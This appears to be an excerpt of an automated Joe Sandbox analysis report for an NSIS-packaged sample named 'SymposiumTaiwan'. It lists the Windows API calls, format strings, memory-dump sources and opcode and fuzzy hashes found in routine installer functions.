                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: Text$ItemTimerWindowwsprintf
                                              • String ID: verifying installer: %d%%
                                              • API String ID: 1451636040-82062127
                                              • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                              • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                              • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                              • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                              APIs
                                              • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                              • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                              • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                              • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: Char$Next$Prev
                                              • String ID: *?|<>/":
                                              • API String ID: 589700163-165019052
                                              • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                              • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                              • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                              • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                              APIs
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                              • RegCloseKey.ADVAPI32(?), ref: 00401504
                                              • RegCloseKey.ADVAPI32(?), ref: 00401529
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: Close$DeleteEnumOpen
                                              • String ID:
                                              • API String ID: 1912718029-0
                                              • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                              • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                              • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                              • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                              APIs
                                              • GetDlgItem.USER32(?), ref: 004020A3
                                              • GetClientRect.USER32(00000000,?), ref: 004020B0
                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                              • DeleteObject.GDI32(00000000), ref: 004020EE
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                              • String ID:
                                              • API String ID: 1849352358-0
                                              • Opcode ID: fbfd7a6a6085d398f7947defe9e72fce66e027f12e5118b4d0e8a3d4981e6075
                                              • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                              • Opcode Fuzzy Hash: fbfd7a6a6085d398f7947defe9e72fce66e027f12e5118b4d0e8a3d4981e6075
                                              • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                              APIs
                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: MessageSend$Timeout
                                              • String ID: !
                                              • API String ID: 1777923405-2657877971
                                              • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                              • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                              • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                              • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                              APIs
                                              • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                              • wsprintfW.USER32 ref: 00404483
                                              • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: ItemTextlstrlenwsprintf
                                              • String ID: %u.%u%s%s
                                              • API String ID: 3540041739-3551169577
                                              • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                              • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                              • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                              • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                              APIs
                                                • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                              • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                              Strings
                                              • DeleteRegKey: "%s\%s", xrefs: 00402843
                                              • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                              • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                              • API String ID: 1697273262-1764544995
                                              • Opcode ID: f70a225c52dc94088ec55034452069e5f0159b4652b3b317631306071439071b
                                              • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                              • Opcode Fuzzy Hash: f70a225c52dc94088ec55034452069e5f0159b4652b3b317631306071439071b
                                              • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                              APIs
                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                              • lstrlenW.KERNEL32 ref: 004026B4
                                              • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                              • String ID: CopyFiles "%s"->"%s"
                                              • API String ID: 2577523808-3778932970
                                              • Opcode ID: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
                                              • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                              • Opcode Fuzzy Hash: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
                                              • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: lstrcatwsprintf
                                              • String ID: %02x%c$...
                                              • API String ID: 3065427908-1057055748
                                              • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                              • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                              • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                              • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                              APIs
                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: PrivateProfileStringWritelstrcpyn
                                              • String ID: <RM>$NathanColeman$WriteINIStr: wrote [%s] %s=%s in %s
                                              • API String ID: 247603264-4012154794
                                              • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                              • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                              • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                              • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                              APIs
                                              • OleInitialize.OLE32(00000000), ref: 00405083
                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                              • String ID: Section: "%s"$Skipping section: "%s"
                                              • API String ID: 2266616436-4211696005
                                              • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                              • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                              • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                              • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                              APIs
                                              • GetDC.USER32(?), ref: 00402100
                                              • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042634C,762323A0,00000000), ref: 00406902
                                              • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                              • String ID:
                                              • API String ID: 1599320355-0
                                              • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                              • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                              • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                              • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                              APIs
                                                • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                              • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                              • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                              • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: lstrcpyn$CreateFilelstrcmp
                                              • String ID: Version
                                              • API String ID: 512980652-315105994
                                              • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                              • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                              • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                              • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                              APIs
                                              • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                              • GetTickCount.KERNEL32 ref: 00403303
                                              • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                              • String ID:
                                              • API String ID: 2102729457-0
                                              • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                              • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                              • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                              • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                              • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                              • String ID:
                                              • API String ID: 2883127279-0
                                              • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                              • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                              • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                              • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                              APIs
